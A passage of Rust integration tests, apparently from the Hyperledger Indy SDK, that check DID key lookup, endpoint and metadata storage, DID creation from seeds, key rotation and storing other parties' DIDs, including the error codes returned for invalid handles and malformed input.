utils::tear_down_with_wallet(wallet_handle, "indy_key_for_did_works_for_their_did", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_get_key_from_ledger() {
let (trustee_wallet_handle, pool_handle, trustee_did, wallet_config) = utils::setup_trustee("indy_key_for_did_works_for_get_key_from_ledger");
let (did, verkey) = did::create_and_store_my_did(trustee_wallet_handle, None).unwrap();
let nym_request = ledger::build_nym_request(&trustee_did, &did, Some(&verkey), None, None).unwrap();
let nym_resp = ledger::sign_and_submit_request(pool_handle, trustee_wallet_handle, &trustee_did, &nym_request).unwrap();
let get_nym_request = ledger::build_get_nym_request(Some(&did), &did).unwrap();
ledger::submit_request_with_retries(pool_handle, &get_nym_request, &nym_resp).unwrap();
wallet::close_wallet(trustee_wallet_handle).unwrap();
wallet::delete_wallet(&wallet_config, WALLET_CREDENTIALS).unwrap();
let (wallet_handle, wallet_config) = wallet::create_and_open_default_wallet("indy_key_for_did_works_for_get_key_from_ledger_2").unwrap();
let received_verkey = did::key_for_did(pool_handle, wallet_handle, &did).unwrap();
assert_eq!(verkey, received_verkey);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_key_for_did_works_for_get_key_from_ledger", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_unknown_did() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_key_for_did_works_for_unknown_did");
let res = did::key_for_did(pool_handle, wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_key_for_did_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_invalid_pool_handle() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_key_for_did_works_for_invalid_pool_handle");
let res = did::key_for_did(INVALID_POOL_HANDLE, wallet_handle, DID_TRUSTEE);
assert_code!(ErrorCode::PoolLedgerInvalidPoolHandle, res);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_key_for_did_works_for_invalid_pool_handle", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_invalid_wallet_handle() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_key_for_did_works_for_invalid_wallet_handle");
let res = did::key_for_did(-1, INVALID_WALLET_HANDLE, &did);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_did_works_for_invalid_wallet_handle", &wallet_config);
}
}
mod key_for_local_did {
use super::*;
#[test]
fn indy_key_for_local_did_works_for_my_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_local_did_works_for_my_did");
let (did, verkey) = did::create_and_store_my_did(wallet_handle, Some(MY1_SEED)).unwrap();
let received_verkey = did::key_for_local_did(wallet_handle, &did).unwrap();
assert_eq!(verkey, received_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_local_did_works_for_my_did", &wallet_config);
}
#[test]
fn indy_key_for_local_did_works_for_their_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_local_did_works_for_their_did");
did::store_their_did_from_parts(wallet_handle, DID, VERKEY).unwrap();
let received_verkey = did::key_for_local_did(wallet_handle, DID).unwrap();
assert_eq!(VERKEY, received_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_local_did_works_for_their_did", &wallet_config);
}
#[test]
fn indy_key_for_local_did_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_local_did_works_for_unknown_did");
let res = did::key_for_local_did(wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_local_did_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_key_for_local_did_works_for_invalid_wallet_handle() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_key_for_local_did_works_for_invalid_wallet_handle");
let res = did::key_for_local_did(INVALID_WALLET_HANDLE, &did);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_local_did_works_for_invalid_wallet_handle", &wallet_config);
}
}
mod set_endpoint_for_did {
use super::*;
#[test]
fn indy_set_endpoint_for_did_works() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_endpoint_for_did_works");
did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, VERKEY).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_endpoint_for_did_works", &wallet_config);
}
#[test]
fn indy_set_endpoint_for_did_works_for_replace() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_set_endpoint_for_did_works_for_replace");
did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, VERKEY).unwrap();
let (endpoint, key) = did::get_endpoint_for_did(wallet_handle, pool_handle, DID).unwrap();
assert_eq!(ENDPOINT, endpoint);
assert_eq!(VERKEY, key.unwrap());
let new_endpoint = "10.10.10.1:9710";
did::set_endpoint_for_did(wallet_handle, DID, new_endpoint, VERKEY_MY2).unwrap();
let (updated_endpoint, updated_key) = did::get_endpoint_for_did(wallet_handle, pool_handle, DID).unwrap();
assert_eq!(new_endpoint, updated_endpoint);
assert_eq!(VERKEY_MY2, updated_key.unwrap());
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_set_endpoint_for_did_works_for_replace", &wallet_config);
}
#[test]
fn indy_set_endpoint_for_did_works_for_invalid_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_endpoint_for_did_works_for_invalid_did");
let res = did::set_endpoint_for_did(wallet_handle, INVALID_BASE58_DID, ENDPOINT, VERKEY);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_endpoint_for_did_works_for_invalid_did", &wallet_config);
}
#[test]
fn indy_set_endpoint_for_did_works_for_invalid_transport_key() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_endpoint_for_did_works_for_invalid_transport_key");
let res = did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, INVALID_BASE58_VERKEY);
assert_code!(ErrorCode::CommonInvalidStructure, res);
let res = did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, INVALID_VERKEY_LENGTH);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_endpoint_for_did_works_for_invalid_transport_key", &wallet_config);
}
#[test]
fn indy_set_endpoint_for_did_works_for_invalid_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_endpoint_for_did_works_for_invalid_handle");
let res = did::set_endpoint_for_did(INVALID_WALLET_HANDLE, DID, ENDPOINT, VERKEY);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_endpoint_for_did_works_for_invalid_handle", &wallet_config);
}
}
mod get_endpoint_for_did {
use super::*;
#[test]
fn indy_get_endpoint_for_did_works() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_get_endpoint_for_did_works");
did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, VERKEY).unwrap();
let (endpoint, key) = did::get_endpoint_for_did(wallet_handle, -1, DID).unwrap();
assert_eq!(ENDPOINT, endpoint);
assert_eq!(VERKEY, key.unwrap());
utils::tear_down_with_wallet(wallet_handle, "indy_get_endpoint_for_did_works", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_from_ledger() {
let (wallet_handle, pool_handle, trustee_did, wallet_config) = utils::setup_trustee("indy_get_endpoint_for_did_works_from_ledger");
let attrib_data = json!({"endpoint": {"ha": ENDPOINT, "verkey": VERKEY_TRUSTEE}}).to_string();
let attrib_request = ledger::build_attrib_request(&trustee_did, &trustee_did, None, Some(&attrib_data), None).unwrap();
ledger::sign_and_submit_request(pool_handle, wallet_handle, &trustee_did, &attrib_request).unwrap();
thread::sleep(std::time::Duration::from_millis(1000));
let (endpoint, key) = did::get_endpoint_for_did(wallet_handle, pool_handle, &trustee_did).unwrap();
assert_eq!(ENDPOINT, endpoint);
assert_eq!(VERKEY_TRUSTEE, key.unwrap());
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_get_endpoint_for_did_works_from_ledger", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_from_ledger_for_address_only() {
let (wallet_handle, pool_handle, trustee_did, wallet_config) = utils::setup_trustee("indy_get_endpoint_for_did_works_from_ledger_for_address_only");
let attrib_data = json!({"endpoint": {"ha": ENDPOINT}}).to_string();
let attrib_request = ledger::build_attrib_request(&trustee_did, &trustee_did, None, Some(&attrib_data), None).unwrap();
ledger::sign_and_submit_request(pool_handle, wallet_handle, &trustee_did, &attrib_request).unwrap();
thread::sleep(std::time::Duration::from_millis(1000));
let (endpoint, key) = did::get_endpoint_for_did(wallet_handle, pool_handle, &trustee_did).unwrap();
assert_eq!(ENDPOINT, endpoint);
assert_eq!(None, key);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_get_endpoint_for_did_works_from_ledger_for_address_only", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_for_unknown_did() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_get_endpoint_for_did_works_for_unknown_did");
let res = did::get_endpoint_for_did(wallet_handle, pool_handle, DID);
assert_code!(ErrorCode::CommonInvalidState, res);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_get_endpoint_for_did_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_invalid_poll_handle() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_get_endpoint_for_did_works_invalid_poll_handle");
let res = did::get_endpoint_for_did(wallet_handle, INVALID_POOL_HANDLE, DID);
assert_code!(ErrorCode::PoolLedgerInvalidPoolHandle, res);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_get_endpoint_for_did_works_invalid_poll_handle", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_get_endpoint_for_did_works_invalid_wallet_handle");
did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, VERKEY).unwrap();
let res = did::get_endpoint_for_did(INVALID_WALLET_HANDLE, -1, DID);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_endpoint_for_did_works_invalid_wallet_handle", &wallet_config);
}
}
mod set_did_metadata {
use super::*;
#[test]
fn indy_set_did_metadata_works() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_set_did_metadata_works");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_their_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_did_metadata_works_for_their_did");
did::store_their_did_from_parts(wallet_handle, DID, VERKEY).unwrap();
did::set_did_metadata(wallet_handle, DID, METADATA).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_their_did", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_replace() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_set_did_metadata_works_for_replace");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
let metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!(METADATA.to_string(), metadata);
let new_metadata = "updated metadata";
did::set_did_metadata(wallet_handle, &did, new_metadata).unwrap();
let updated_metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!(new_metadata, updated_metadata);
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_replace", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_empty_string() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_set_did_metadata_works_for_empty_string");
did::set_did_metadata(wallet_handle, &did, "").unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_empty_string", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_invalid_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_did_metadata_works_for_invalid_did");
let res = did::set_did_metadata(wallet_handle, INVALID_BASE58_DID, METADATA);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_invalid_did", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_did_metadata_works_for_unknown_did");
did::set_did_metadata(wallet_handle, &DID, METADATA).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_invalid_handle() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_set_did_metadata_works_for_invalid_handle");
let res = did::set_did_metadata(INVALID_WALLET_HANDLE, &did, METADATA);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_invalid_handle", &wallet_config);
}
}
mod get_did_metadata {
use super::*;
#[test]
fn indy_get_did_metadata_works() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
let metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!(METADATA.to_string(), metadata);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_their_did() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works_for_their_did");
did::store_their_did_from_parts(wallet_handle, &did, VERKEY).unwrap();
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
let metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!(METADATA.to_string(), metadata);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_their_did", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_empty_string() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works_for_empty_string");
did::set_did_metadata(wallet_handle, &did, "").unwrap();
let metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!("", metadata);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_empty_string", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_no_metadata() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works_for_no_metadata");
let res = did::get_did_metadata(wallet_handle, &did);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_no_metadata", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_get_did_metadata_works_for_unknown_did");
let res = did::get_did_metadata(wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_invalid_handle() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works_for_invalid_handle");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
let res = did::get_did_metadata(INVALID_WALLET_HANDLE, &did);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_invalid_handle", &wallet_config);
}
}
mod get_my_did_metadata {
use super::*;
#[test]
fn indy_get_my_did_metadata_works() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_my_did_metadata_works");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
did::get_my_did_with_metadata(wallet_handle, &did).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_get_my_did_metadata_works", &wallet_config);
}
#[test]
fn indy_get_my_did_metadata_works_for_no_metadata() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_my_did_metadata_works_for_no_metadata");
did::get_my_did_with_metadata(wallet_handle, &did).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_get_my_did_metadata_works_for_no_metadata", &wallet_config);
}
#[test]
fn indy_get_my_did_metadata_works_with_temp_verkey() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_my_did_metadata_works_with_temp_verkey");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
did::replace_keys_start(wallet_handle, &did, "{}").unwrap();
did::get_my_did_with_metadata(wallet_handle, &did).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_get_my_did_metadata_works_with_temp_verkey", &wallet_config);
}
#[test]
fn indy_get_my_did_metadata_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_get_my_did_metadata_works_for_unknown_did");
let res = did::get_my_did_with_metadata(wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_my_did_metadata_works_for_unknown_did", &wallet_config);
}
}
mod create_my_did {
use super::*;
use rust_base58::FromBase58;
#[test]
fn indy_create_my_did_works_for_empty_json() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_empty_json");
let (my_did, my_verkey) = did::create_my_did(wallet_handle, "{}").unwrap();
assert_eq!(my_did.from_base58().unwrap().len(), 16);
assert_eq!(my_verkey.from_base58().unwrap().len(), 32);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_empty_json", &wallet_config);
}
#[test]
fn indy_create_my_did_works_with_seed() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_with_seed");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, Some(MY1_SEED)).unwrap();
assert_eq!(my_did, DID_MY1);
assert_eq!(my_verkey, VERKEY_MY1);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_with_seed", &wallet_config);
}
#[test]
fn indy_create_my_did_works_with_hex_seed() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_with_hex_seed");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, Some("94a823a6387cdd30d8f7687d95710ebab84c6e277b724790a5b221440beb7df6")).unwrap();
assert_eq!(my_did, "HWvjYf77k1dqQAk6sE4gaS");
assert_eq!(my_verkey, "<KEY>");
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_with_hex_seed", &wallet_config);
}
#[test]
fn indy_create_my_did_works_as_cid() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_as_cid");
let (my_did, my_verkey) = did::create_my_did(wallet_handle, r#"{"seed":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","cid":true}"#).unwrap();
assert_eq!(my_did, VERKEY);
assert_eq!(my_verkey, VERKEY);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_as_cid", &wallet_config);
}
#[test]
fn indy_create_my_did_works_with_passed_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_with_passed_did");
let (my_did, my_verkey) = did::create_my_did(wallet_handle, &format!(r#"{{"did":"{}","seed":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}}"#, DID)).unwrap();
assert_eq!(my_did, DID);
assert_eq!(my_verkey, VERKEY);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_with_passed_did", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_exists_crypto_type() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_exists_crypto_type");
did::create_my_did(wallet_handle, r#"{"crypto_type":"ed25519"}"#).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_exists_crypto_type", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_invalid_wallet_handle");
let res = did::create_my_did(INVALID_WALLET_HANDLE, "{}");
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_invalid_wallet_handle", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_duplicate() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_duplicate");
let (my_did, _) = did::create_my_did(wallet_handle, "{}").unwrap();
let res = did::create_my_did(wallet_handle, &format!(r#"{{"did":{:?}}}"#, my_did));
assert_code!(ErrorCode::DidAlreadyExistsError, res);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_duplicate", &wallet_config);
}
}
mod replace_keys_start {
use super::*;
#[test]
fn indy_replace_keys_start_works() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_start_works");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, None).unwrap();
let new_verkey = did::replace_keys_start(wallet_handle, &my_did, "{}").unwrap();
assert_ne!(new_verkey, my_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_start_works", &wallet_config);
}
#[test]
fn indy_replace_keys_start_works_for_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_start_works_for_invalid_wallet_handle");
let (my_did, _) = did::create_and_store_my_did(wallet_handle, None).unwrap();
let res = did::replace_keys_start(INVALID_WALLET_HANDLE, &my_did, "{}");
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_start_works_for_invalid_wallet_handle", &wallet_config);
}
#[test]
fn indy_replace_keys_start_works_for_seed() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_start_works_for_seed");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, None).unwrap();
let new_verkey = did::replace_keys_start(wallet_handle, &my_did, r#"{"seed":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}"#).unwrap();
assert_eq!(new_verkey, VERKEY);
assert_ne!(my_verkey, new_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_start_works_for_seed", &wallet_config);
}
}
mod replace_keys_apply {
use super::*;
#[test]
fn indy_replace_keys_apply_works() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_apply_works");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, None).unwrap();
let new_verkey = did::replace_keys_start(wallet_handle, &my_did, "{}").unwrap();
assert_ne!(new_verkey, my_verkey);
did::replace_keys_apply(wallet_handle, &my_did).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_apply_works", &wallet_config);
}
#[test]
fn indy_replace_keys_apply_works_without_calling_replace_start() {
let (wallet_handle, my_did, wallet_config) = utils::setup_did("indy_replace_keys_apply_works_without_calling_replace_start");
let res = did::replace_keys_apply(wallet_handle, &my_did);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_apply_works_without_calling_replace_start", &wallet_config);
}
#[test]
fn indy_replace_keys_apply_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_apply_works_for_unknown_did");
let res = did::replace_keys_apply(wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_apply_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_replace_keys_apply_works_for_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_apply_works_for_invalid_wallet_handle");
let res = did::replace_keys_apply(INVALID_WALLET_HANDLE, DID);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_apply_works_for_invalid_wallet_handle", &wallet_config);
}
}
mod store_their_did {
use super::*;
#[test]
fn indy_store_their_did_works_for_did_only() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_did_only");
let identity_json = json!({"did": DID}).to_string();
did::store_their_did(wallet_handle, &identity_json).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_did_only", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_verkey() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_verkey");
let identity_json = json!({"did": DID, "verkey": VERKEY}).to_string();
did::store_their_did(wallet_handle, &identity_json).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_verkey", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_verkey_with_crypto_type() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_verkey_with_crypto_type");
let identity_json = json!({"did": DID, "verkey": VERKEY.to_owned() + ":ed25519"}).to_string();
did::store_their_did(wallet_handle, &identity_json).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_verkey_with_crypto_type", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_invalid_seed() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_invalid_seed");
let res = did::create_my_did(wallet_handle, r#"{"seed":"seed"}"#);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_invalid_seed", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_invalid_wallet_handle");
let identity_json = json!({"did": DID}).to_string();
let res = did::store_their_did(INVALID_WALLET_HANDLE, &identity_json);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_invalid_wallet_handle", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_abbreviated_verkey() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_abbreviated_verkey");
let identity_json = r#"{"did":"8wZcEriaNLNKtteJvx7f8i", "verkey":"~<KEY>"}"#;
did::store_their_did(wallet_handle, identity_json).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_abbreviated_verkey", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_invalid_json() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_invalid_json");
let res = did::create_my_did(wallet_handle, r#"{"seed":123}"#);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_invalid_json", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_invalid_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_invalid_did");
let identity_json = json!({"did": INVALID_BASE58_DID}).to_string();
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_invalid_did", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_invalid_verkey() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_invalid_verkey");
let identity_json = json!({"did": "did", "verkey":"invalid_base58string"}).to_string();
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_invalid_verkey", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_verkey_with_invalid_crypto_type() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_verkey_with_invalid_crypto_type");
let identity_json = json!({"did": DID, "verkey": VERKEY.to_owned() + ":crypto_type"}).to_string();
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::UnknownCryptoTypeError, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_verkey_with_invalid_crypto_type", &wallet_config);
}
#[test]
fn indy_store_their_did_works_twice() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_twice");
let identity_json = json!({"did": DID}).to_string();
did::store_their_did(wallet_handle, &identity_json).unwrap();
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::WalletItemAlreadyExists, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_twice", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_is_802() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_is_802");
let identity_json = json!({"did": DID, "verkey": VERKEY}).to_string();
// 1. Try 'storeTheirDid' operation with say did1 and verkey1
did::store_their_did(wallet_handle, &identity_json).unwrap();
// 2. Repeat above operation (with same did and ver key used in #1)
// but this time catch and swallow the exception (it will throw the exception WalletItemAlreadyExistsException)
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::WalletItemAlreadyExists, res);
// 3. Then, now if you try 'storeTheirDid' operation
// (either with same did and verkey or you can choose different did and verkey),
// in IS-802 it fails with error 'Storage error occurred during wallet operation.'
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::WalletItemAlreadyExists, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_is_802", &wallet_config);
}
}
mod replace_keys {
use super::*;
#[test]
fn indy_replace_keys_demo() {
